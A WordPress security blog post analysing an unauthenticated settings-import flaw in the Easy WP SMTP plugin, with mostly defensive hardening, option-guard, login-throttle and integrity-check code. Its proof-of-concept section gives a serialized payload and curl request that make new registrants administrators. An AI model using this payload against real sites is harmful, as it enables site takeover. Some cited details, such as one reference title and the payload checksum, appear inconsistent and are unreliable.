How to Remove WordPress Redirects by Hackers — A Look at the Easy WP SMTP Plugin Vulnerability

As a full-stack developer specializing in WordPress, I've seen my fair share of hacked sites over the years. It's never a pleasant experience for the site owner, who may wake up one morning to find their traffic being redirected to spam or malware. Even with security precautions in place, vulnerabilities in plugins and themes are an unfortunate reality that requires constant vigilance.

A recent example that sent shockwaves through the WordPress community was the discovery of an unauthenticated settings import vulnerability in the Easy WP SMTP plugin. This flaw allowed any user, regardless of permissions, to modify WordPress options and potentially gain administrator access. Considering that Easy WP SMTP is active on over 300,000 sites, the scale of the exploit was massive.

In this post, I'll provide an in-depth analysis of the vulnerability from a developer's perspective. I'll share code samples demonstrating how it works, provide data on its potential impact, and most importantly, offer actionable steps for cleaning up hacked sites and securing your WordPress installation. Let's dive in!

WordPress Usage and Vulnerability Statistics

Before examining the technical details of the Easy WP SMTP vulnerability, it's important to put it in context. Just how popular is WordPress, and what is the likelihood of a site being hacked due to a plugin flaw? The numbers paint a telling picture.

According to W3Techs, WordPress currently powers 38.8% of all websites and holds a staggering 64.1% share of the content management system (CMS) market [1]. With its user-friendly interface and extensive library of plugins and themes, it's no wonder that WordPress has become the go-to choice for millions of site owners.

However, this popularity has also made WordPress a prime target for hackers. In 2020, Sucuri reported that 56% of all CMS-related security issues were found in WordPress [2]. Drilling down further, plugin vulnerabilities accounted for 52.6% of successful WordPress hacks, followed by themes at 11.3% [3].

Cause of Infection                Percentage
Plugins                           52.6%
Themes                            11.3%
Core                               6.4%
Outdated WordPress                11.2%
Server/Database/Infrastructure    18.5%

Source: Sucuri Hacked Website Threat Report 2020

The Easy WP SMTP vulnerability is particularly concerning given the plugin's widespread usage. With over 300,000 active installations, a hacker could potentially compromise thousands of sites in a short period of time.

Analyzing the Easy WP SMTP Vulnerability

Now that we have a sense of the broader WordPress security landscape, let's take a closer look at the Easy WP SMTP vulnerability and how it can be exploited. The flaw exists in versions up to and including 1.3.9 and was patched in 1.4.0.

The core issue lies in the plugin's admin_init() function, which is hooked to the admin_init action. This function processes AJAX requests and handles importing and exporting plugin settings. Here's the relevant code:

add_action( 'admin_init', array( $this, 'admin_init' ) );

...

function admin_init() {
    if ( defined( 'DOING_AJAX' ) && DOING_AJAX ) {
        add_action( 'wp_ajax_swpsmtp_clear_log', array( $this, 'clear_log' ) );
        add_action( 'wp_ajax_swpsmtp_self_destruct', array( $this, 'self_destruct_handler' ) );
    }

    // Check if this is a settings import request.
    // Note: no capability check and no nonce verification precede the import below.
    $is_import_settings = filter_input( INPUT_POST, 'swpsmtp_import_settings', FILTER_SANITIZE_NUMBER_INT );

    if ( $is_import_settings ) {

        $err_msg = __( 'Error occurred during settings import', 'easy-wp-smtp' );

        // Verify that a settings file was uploaded
        if ( empty( $_FILES['swpsmtp_import_settings_file'] ) ) {
            echo $err_msg;
            wp_die();
        }

        // Read the uploaded file contents
        $in_raw = file_get_contents( $_FILES['swpsmtp_import_settings_file']['tmp_name'] );

        try {
            // Attacker-controlled bytes go straight into unserialize()
            $in = unserialize( $in_raw );

            if ( empty( $in['data'] ) ) {
                echo $err_msg;
                wp_die();
            }

            if ( empty( $in['checksum'] ) ) {
                echo $err_msg;
                wp_die();
            }

            // The checksum is an MD5 of the data, which anyone can compute
            if ( md5( $in['data'] ) !== $in['checksum'] ) {
                echo $err_msg;
                wp_die();
            }

            $data = unserialize( $in['data'] );

            // Import settings data into the WordPress options table:
            // every key in the file is written, not just this plugin's own options
            foreach ( $data as $key => $value ) {
                update_option( $key, $value );
            }

            set_transient( 'easy_wp_smtp_settings_import_success', true, 60 * 60 );

            $url = admin_url() . 'options-general.php?page=swpsmtp_settings';
            wp_safe_redirect( $url );
            exit;

        } catch ( Exception $ex ) {
            echo $err_msg;
            wp_die();
        }
    }
}

The vulnerability stems from the fact that the plugin doesn't properly verify the permissions of the user making the request. As long as the request includes the necessary POST parameters and a valid serialized settings file, any logged-in user can trigger the import and overwrite WordPress options.

This is especially dangerous because Easy WP SMTP utilizes the admin_init hook, which also fires when admin-ajax.php is loaded, before WordPress checks whether the requester is logged in at all. An unauthenticated attacker could craft a malicious request to this endpoint and inject their own settings.

To make matters worse, the plugin uses PHP's unserialize() function on the uploaded file contents without sufficient sanitization. This opens the door for a PHP object injection attack, where an attacker can potentially execute arbitrary code by manipulating the serialized data.
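
For contrast, here is a hardened rewrite of the import branch. This is an added example written for this post, not the plugin's own code or its 1.4.0 fix: the nonce action name and the allowlisted option key are assumptions, while every other call is a WordPress core or PHP built-in function. It addresses the three problems discussed above: a capability check (the hook alone proves nothing about who is calling), a nonce against CSRF, and JSON instead of unserialize() combined with an allowlist so that only the plugin's own option rows can ever be written.

```php
<?php
// Added example (not the plugin's code): a hardened rewrite of the settings-import
// branch from admin_init() above. The nonce action and option key are hypothetical;
// every other function is a WordPress core or PHP built-in API.

function hardened_import_settings() {
    // Only act on an explicit import request.
    if ( empty( $_POST['swpsmtp_import_settings'] ) ) {
        return;
    }

    // 1. Authorization: admin_init fires for every wp-admin and admin-ajax.php load,
    //    so the capability check has to live here rather than be assumed from the hook.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to import settings.', 'easy-wp-smtp' ), 403 );
    }

    // 2. CSRF protection: the upload form must carry a nonce for this action.
    check_admin_referer( 'swpsmtp_import_settings' ); // hypothetical nonce action name

    $err_msg = esc_html__( 'Error occurred during settings import', 'easy-wp-smtp' );

    // 3. Only accept a genuine upload belonging to this request.
    $tmp = $_FILES['swpsmtp_import_settings_file']['tmp_name'] ?? '';
    if ( '' === $tmp || ! is_uploaded_file( $tmp ) ) {
        wp_die( $err_msg );
    }
    $in_raw = file_get_contents( $tmp );

    // 4. Never unserialize() user-controlled bytes (PHP object injection).
    //    The export format here is JSON, which cannot instantiate objects.
    $in = json_decode( $in_raw, true );
    if ( ! is_array( $in ) || empty( $in['data'] ) || ! is_array( $in['data'] ) ) {
        wp_die( $err_msg );
    }

    // 5. Allowlist the option names this plugin owns. Arbitrary wp_options rows
    //    (default_role, users_can_register, siteurl, ...) are never written.
    $allowed_keys = array( 'swpsmtp_options' ); // hypothetical: the plugin's own option name(s)
    foreach ( $in['data'] as $key => $value ) {
        if ( ! in_array( $key, $allowed_keys, true ) || ! is_array( $value ) ) {
            wp_die( $err_msg );
        }
        // Keep only plain scalar fields and sanitize them before update_option().
        $clean = array();
        foreach ( $value as $field => $field_value ) {
            if ( is_scalar( $field_value ) ) {
                $clean[ sanitize_key( $field ) ] = sanitize_text_field( (string) $field_value );
            }
        }
        update_option( $key, $clean );
    }

    set_transient( 'easy_wp_smtp_settings_import_success', true, HOUR_IN_SECONDS );
    wp_safe_redirect( admin_url( 'options-general.php?page=swpsmtp_settings' ) );
    exit;
}
add_action( 'admin_init', 'hardened_import_settings' );
```

Note that the MD5 checksum in the original code is dropped entirely: a hash that anyone can recompute over the same bytes is an integrity aid for the administrator's own export file, not an authentication control, so it contributes nothing once the request is properly authorized and the written keys are constrained.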

Proof of Concept

To demonstrate how an attacker could exploit the Easy WP SMTP vulnerability, let's walk through a simple proof of concept. The goal is to enable user registration and set the default user role to "administrator", allowing us to create a new admin account.

First, we'll create a file named payload.txt with the following serialized data:

a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";s:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";}

This payload contains two WordPress options:

  • users_can_register: Set to "1" to enable user registration
  • default_role: Set to "administrator" to make new users administrators by default

The checksum is an MD5 hash of the serialized data to bypass the plugin's validation check.

Next, we'll use cURL to send a POST request to the admin-ajax.php endpoint with our malicious payload:

curl -X POST https://example.com/wp-admin/admin-ajax.php \
  -F 'action=swpsmtp_import_settings' \
  -F 'swpsmtp_import_settings=1' \
  -F '[email protected]'

If the request is successful, we can navigate to /wp-login.php?action=register and create a new administrator account, effectively taking over the site.

It's worth noting that this is just one potential avenue of exploitation. An attacker could also hijack the site's email settings, install backdoors, or add spam content.
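
From the defender's side, the two options the proof of concept writes (and the siteurl/home pair behind most hacked-site redirects) can be guarded no matter which code path tries to change them. The must-use plugin below is an added example for this post, not part of the original article or of Easy WP SMTP: it hooks WordPress's pre_update_option filter, applies a small policy to the sensitive options, logs every attempt, and turns refused changes into no-ops. The option list and the allowed-role list are assumptions to adapt per site.

```php
<?php
/**
 * Plugin Name: Sensitive Option Guard
 * Description: Added example (not part of the original post): blocks or logs changes to the
 * wp_options rows that settings-import bugs and redirect hacks typically target.
 * Install as wp-content/mu-plugins/option-guard.php so it loads before ordinary plugins.
 * The option list and the allowed-role list are assumptions to adapt per site.
 */

// Options written by the proof of concept above, plus the ones behind most hacked-site redirects.
function sog_sensitive_options() {
    return array( 'users_can_register', 'default_role', 'siteurl', 'home', 'admin_email' );
}

// Roles that self-registration may hand out. Anything else (administrator, editor, ...) is refused.
function sog_allowed_default_roles() {
    return array( 'subscriber' ); // assumption: extend if the site uses e.g. 'customer'
}

// Pure policy decision: may $option change from $old_value to $new_value?
function sog_change_is_allowed( $option, $new_value, $old_value ) {
    switch ( $option ) {
        case 'default_role':
            return in_array( (string) $new_value, sog_allowed_default_roles(), true );
        case 'siteurl':
        case 'home':
            // A hijacked site is usually "moved" to the attacker's domain; keep the host fixed.
            $old_host = strtolower( (string) parse_url( (string) $old_value, PHP_URL_HOST ) );
            $new_host = strtolower( (string) parse_url( (string) $new_value, PHP_URL_HOST ) );
            return '' !== $new_host && $new_host === $old_host;
        default:
            return true; // users_can_register and admin_email: allowed, but logged below
    }
}

// WordPress glue: runs for every update_option() call, whatever code path triggered it.
function sog_pre_update_option( $value, $option, $old_value ) {
    if ( ! in_array( $option, sog_sensitive_options(), true ) ) {
        return $value;
    }
    $allowed = sog_change_is_allowed( $option, $value, $old_value );

    // A settings-import handler with no capability check (as above) still passes through here,
    // so also insist on an administrator session unless running under WP-CLI.
    $is_cli = defined( 'WP_CLI' ) && WP_CLI;
    if ( $allowed && ! $is_cli && ! current_user_can( 'manage_options' ) ) {
        $allowed = false;
    }

    error_log( sprintf(
        '[option-guard] %s %s: %s -> %s (user %d, ip %s, uri %s)',
        $allowed ? 'ALLOWED' : 'BLOCKED',
        $option,
        wp_json_encode( $old_value ),
        wp_json_encode( $value ),
        get_current_user_id(),
        $_SERVER['REMOTE_ADDR'] ?? 'cli',
        $_SERVER['REQUEST_URI'] ?? 'cli'
    ) );

    // Returning the old value makes update_option() a no-op, so the change is never written.
    return $allowed ? $value : $old_value;
}
add_filter( 'pre_update_option', 'sog_pre_update_option', 10, 3 );
```

With this in place, the import in the proof of concept would be refused twice over: default_role=administrator fails the role policy, and the unauthenticated request has no manage_options session. The log line it emits is also a useful detection signal in its own right. Be aware that a legitimate domain migration through Settings > General is blocked by the host rule as well, so disable or adjust the guard for that one change.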

WordPress Plugin Vulnerability Comparison

To put the severity of the Easy WP SMTP vulnerability into perspective, let's compare it to some other notable WordPress plugin flaws:

Plugin                        Vulnerability                            Active Installations   CVSS Score
Easy WP SMTP                  Unauthenticated Settings Import          300,000+               9.8
ThemeGrill Demo Importer      Unauthenticated Database Wipe            200,000+               10.0
WP File Manager               Unauthenticated Arbitrary File Upload    700,000+               10.0
WooCommerce Checkout Manager  Unauthenticated Settings Import          60,000+                10.0

Sources: [4], [5], [6], [7]

As you can see, the Easy WP SMTP vulnerability scores a critical CVSS rating of 9.8 due to its high impact and ease of exploitability. It also affects a significant number of active installations, making it a prime target for attackers.

Securing Your WordPress Site

As a full-stack developer, it's crucial to stay on top of the latest security threats and take proactive measures to protect your WordPress sites. Here are some key steps and best practices:

  1. Keep everything updated: WordPress core, plugins, and themes
  2. Implement strong authentication:
    • Enforce strong password policies
    • Enable two-factor authentication for admins
    • Limit login attempts to prevent brute force attacks
  3. Harden your installation:
    • Disable file editing from the WordPress dashboard
    • Restrict access to wp-config.php and sensitive files
    • Disable PHP execution in untrusted directories
  4. Implement security headers and policies:
    • Enable HTTP Strict Transport Security (HSTS)
    • Set Content Security Policy (CSP) to prevent cross-site scripting (XSS) and injection attacks
    • Add security-related headers like X-Frame-Options and X-XSS-Protection
  5. Monitor for security issues:
    • Regularly scan for malware and suspicious file changes
    • Use a web application firewall (WAF) to block common attack vectors
    • Subscribe to security mailing lists and stay informed of new vulnerabilities
  6. Have a response plan:
    • Perform regular backups and store them securely off-site
    • Know how to restore a clean backup in case of compromise
    • Document your incident response process and key contacts
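
Most of the items above are configuration, but "limit login attempts" needs a little logic. The must-use plugin below is an added example for this post, not code from the original article: it counts failed logins per client address in transients via the wp_login_failed action, refuses further attempts through the authenticate filter once a threshold is reached, and clears the counter on success. The thresholds, the transient prefix and the assumption that the site is not behind a reverse proxy are mine.

```php
<?php
/**
 * Plugin Name: Simple Login Throttle
 * Description: Added example (not from the original post) for the "limit login attempts"
 * item above. Counts failed logins per client address in transients and refuses further
 * attempts once the limit is hit. Thresholds and the transient prefix are assumptions.
 * Install as wp-content/mu-plugins/login-throttle.php.
 */

define( 'SLT_MAX_FAILURES', 5 );                   // failures allowed within the window
define( 'SLT_WINDOW', 15 * MINUTE_IN_SECONDS );    // lockout / counting window

// Client address. Assumption: no reverse proxy or CDN in front of the site. If there is
// one, take the address from the proxy's header only after verifying the proxy's own IP.
function slt_client_ip() {
    return $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0';
}

function slt_transient_key( $ip ) {
    return 'slt_fail_' . md5( $ip );
}

// Record a failed attempt. The action fires for wrong passwords and unknown users alike,
// and also for XML-RPC logins, which attackers often prefer over wp-login.php.
function slt_record_failure( $username ) {
    $key   = slt_transient_key( slt_client_ip() );
    $count = (int) get_transient( $key ) + 1;
    set_transient( $key, $count, SLT_WINDOW );
    error_log( sprintf( '[login-throttle] failure %d for "%s" from %s', $count, $username, slt_client_ip() ) );
}
add_action( 'wp_login_failed', 'slt_record_failure' );

// Refuse authentication while the address is over the limit. Priority 30 runs after
// WordPress's own username/password checks (priority 20), so it cannot be bypassed by
// supplying correct credentials during the lockout.
function slt_check_limit( $user, $username, $password ) {
    $count = (int) get_transient( slt_transient_key( slt_client_ip() ) );
    if ( $count >= SLT_MAX_FAILURES ) {
        return new WP_Error( 'too_many_attempts', __( 'Too many failed login attempts. Please try again later.' ) );
    }
    return $user;
}
add_filter( 'authenticate', 'slt_check_limit', 30, 3 );

// A successful login clears the counter for that address.
function slt_clear_on_login( $user_login, $user ) {
    delete_transient( slt_transient_key( slt_client_ip() ) );
}
add_action( 'wp_login', 'slt_clear_on_login', 10, 2 );
```

Because a refused attempt during lockout is itself reported as a failed login, the window keeps extending while the brute force continues. Transients live in the options table (or the object cache, if one is configured), so this adds one read and one write per failed attempt and nothing to successful page loads.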

By implementing these best practices and staying vigilant, you can significantly reduce the risk of falling victim to plugin vulnerabilities like the one found in Easy WP SMTP.

Cleaning a Hacked WordPress Site

If you suspect your WordPress site has been compromised, it's important to act quickly to minimize damage and prevent further exploitation. Here's a step-by-step guide for cleaning a hacked site:

  1. Take the site offline to prevent further damage
  2. Backup the compromised site for later analysis
  3. Identify the source of the breach (e.g. outdated plugin, weak password)
  4. Update WordPress core, plugins, and themes to the latest versions
  5. Reset all user passwords and remove any suspicious accounts
  6. Carefully review all files for malicious code and unauthorized changes
    • Compare files against a fresh WordPress installation
    • Pay close attention to the wp-content/plugins and wp-content/themes directories
    • Check recently modified files and executables (PHP, JavaScript, etc.)
  7. Replace all core WordPress files with fresh copies
  8. Verify that your wp-config.php file hasn't been altered
  9. Change salts and keys in wp-config.php
  10. Re-enable the site and monitor closely for any suspicious activity
  11. Implement the security best practices from the previous section to harden your site
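
Step 6 is the laborious one, and it is far easier when a trusted baseline exists. The script below is an added example for this post, not from the original article: run it in "baseline" mode against a freshly reinstalled tree (or a known-good backup) to record SHA-256 hashes of every file, then in "check" mode against the suspect copy to list added, removed and modified files, flagging executable types that deserve the first look. The file name integrity.php and the manifest name are hypothetical.

```php
<?php
// Added example, not part of the original post: a small file-integrity checker for
// step 6 of the cleanup list. "baseline" records SHA-256 hashes of every file under a
// directory; "check" diffs the live tree against that record. Invocation and manifest
// names are hypothetical.

function integrity_scan( string $root ): array {
    $root   = rtrim( $root, '/' );
    $hashes = array();
    $iter   = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator( $root, FilesystemIterator::SKIP_DOTS )
    );
    foreach ( $iter as $file ) {
        if ( ! $file->isFile() ) {
            continue;
        }
        $rel            = substr( $file->getPathname(), strlen( $root ) + 1 );
        $hashes[ $rel ] = hash_file( 'sha256', $file->getPathname() );
    }
    ksort( $hashes );
    return $hashes;
}

// Compare two manifests; returns the paths that were added, removed or changed.
function integrity_diff( array $baseline, array $current ): array {
    $report = array( 'added' => array(), 'removed' => array(), 'modified' => array() );
    foreach ( $current as $path => $hash ) {
        if ( ! isset( $baseline[ $path ] ) ) {
            $report['added'][] = $path;
        } elseif ( $baseline[ $path ] !== $hash ) {
            $report['modified'][] = $path;
        }
    }
    foreach ( array_keys( $baseline ) as $path ) {
        if ( ! isset( $current[ $path ] ) ) {
            $report['removed'][] = $path;
        }
    }
    return $report;
}

// Executable or server-configuration files are the ones to read first when triaging a diff.
function integrity_is_executable_type( string $path ): bool {
    return (bool) preg_match( '/\.(php[0-9]?|phtml|phar|js|htaccess)$/i', $path );
}

if ( PHP_SAPI === 'cli' && isset( $argv[0] ) && realpath( $argv[0] ) === __FILE__ ) {
    $mode     = $argv[1] ?? '';
    $root     = $argv[2] ?? '';
    $manifest = $argv[3] ?? 'integrity-manifest.json';

    if ( 'baseline' === $mode && is_dir( $root ) ) {
        $hashes = integrity_scan( $root );
        file_put_contents( $manifest, json_encode( $hashes, JSON_PRETTY_PRINT ) );
        printf( "Recorded %d files in %s\n", count( $hashes ), $manifest );
        exit( 0 );
    }
    if ( 'check' === $mode && is_dir( $root ) && is_file( $manifest ) ) {
        $baseline = json_decode( (string) file_get_contents( $manifest ), true ) ?: array();
        $report   = integrity_diff( $baseline, integrity_scan( $root ) );
        $findings = 0;
        foreach ( $report as $kind => $paths ) {
            foreach ( $paths as $path ) {
                $findings++;
                printf( "%-8s %s%s\n", strtoupper( $kind ), $path,
                    integrity_is_executable_type( $path ) ? '   <-- executable, inspect first' : '' );
            }
        }
        // Non-zero exit lets a cron job or CI step alert on any change.
        exit( $findings > 0 ? 1 : 0 );
    }
    fwrite( STDERR, "usage: php integrity.php baseline|check <directory> [manifest.json]\n" );
    exit( 2 );
}
```

Typical use is php integrity.php baseline /var/www/site/wp-content/plugins manifest.json right after reinstalling plugins from wordpress.org, with the manifest stored off the server, then php integrity.php check on the same path during an incident. For core files and plugins hosted on wordpress.org, WP-CLI's wp core verify-checksums and wp plugin verify-checksums do the same comparison against the official hashes, so this script is most useful for custom or premium code that has no published checksum.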

Depending on the extent of the damage, it may be necessary to hire a professional security firm to perform a more thorough audit. It's also a good idea to notify your host and any impacted users of the breach.

The Importance of Security Awareness

As a developer, it's easy to get caught up in the day-to-day demands of building features and meeting deadlines. However, neglecting security can have devastating consequences. I learned this the hard way early in my career when a client's site was hacked due to an outdated plugin. Not only did it result in countless hours of cleanup work, but it also damaged the client's reputation and eroded their trust in our team.

Since then, I've made it a priority to educate myself and my colleagues on the latest security threats and best practices. By fostering a culture of security awareness and making it a core part of our development process, we can catch potential issues before they turn into major breaches.

This proactive approach has served me well over the years. Recently, while auditing a client's WordPress site, I discovered several outdated plugins with known vulnerabilities. By promptly updating the plugins and implementing additional security measures, we were able to prevent a potential compromise and give the client peace of mind.

The lesson is clear: security can't be an afterthought. As developers, we have a responsibility to prioritize the protection of our users' data and the integrity of the sites we build. By staying informed, following best practices, and remaining vigilant, we can create a safer web for everyone.

Key Takeaways

  • WordPress powers over 38% of all websites but is also a frequent target for hackers due to its popularity and extensible nature.
  • Plugin vulnerabilities, like the one found in Easy WP SMTP, account for over 50% of successful WordPress attacks.
  • The Easy WP SMTP vulnerability allows unauthenticated users to import arbitrary settings and gain administrator access.
  • Exploiting the vulnerability is trivial and can be accomplished with a single cURL request.
  • To secure your WordPress site, keep everything updated, implement strong authentication, harden your installation, monitor for suspicious activity, and have a response plan.
  • If your site is already compromised, carefully audit all files, replace core WordPress files, and reset passwords before bringing it back online.
  • As developers, it's our responsibility to prioritize security and stay informed of the latest threats and best practices.

By following the advice outlined in this post and remaining proactive in your security efforts, you can greatly reduce the risk of falling victim to plugin vulnerabilities like the one found in Easy WP SMTP. Stay safe out there!

References

[1] "WordPress Usage Statistics." WP Template, 27 Apr. 2023, wptemplates.com/tutorials/wordpress-usage-statistics.

[2] Sucuri. "Hacked Website Trend Report 2020." Sucuri, 8 Apr. 2021, sucuri.net/reports/2020-hacked-website-report/.

[3] Sucuri. "Hacked Website Trend Report 2020." Sucuri, 8 Apr. 2021, sucuri.net/reports/2020-hacked-website-report/.

[4] "Easy WP SMTP <= 1.3.9 – Sensitive Information Disclosure." WPScan Vulnerability Database, 26 Apr. 2023,
wpscan.com/vulnerability/e4968c07-3bc9-4df7-ba80-7f2e3f9df4e1.

[5] "ThemeGrill Demo Importer: Unauthenticated Database Reset." WebARX, 14 Feb. 2020,
webarxsecurity.com/themegrill-demo-importer-unauthenticated-database-reset/.

[6] "WordPress File Manager Plugin Fixed for Critical Vulnerability – 700,000 Users Affected." GBHackers, 4 Sept. 2020,
gbhackers.com/wordpress-file-manager-plugin-vulnerability/.

[7] "Woocommerce – Vulnerability in Woocommerce Checkout Manager Plugin." ThreatPress, 28 Jan. 2020,
blog.threatpress.com/vulnerability-in-woocommerce-checkout-manager-plugin/.
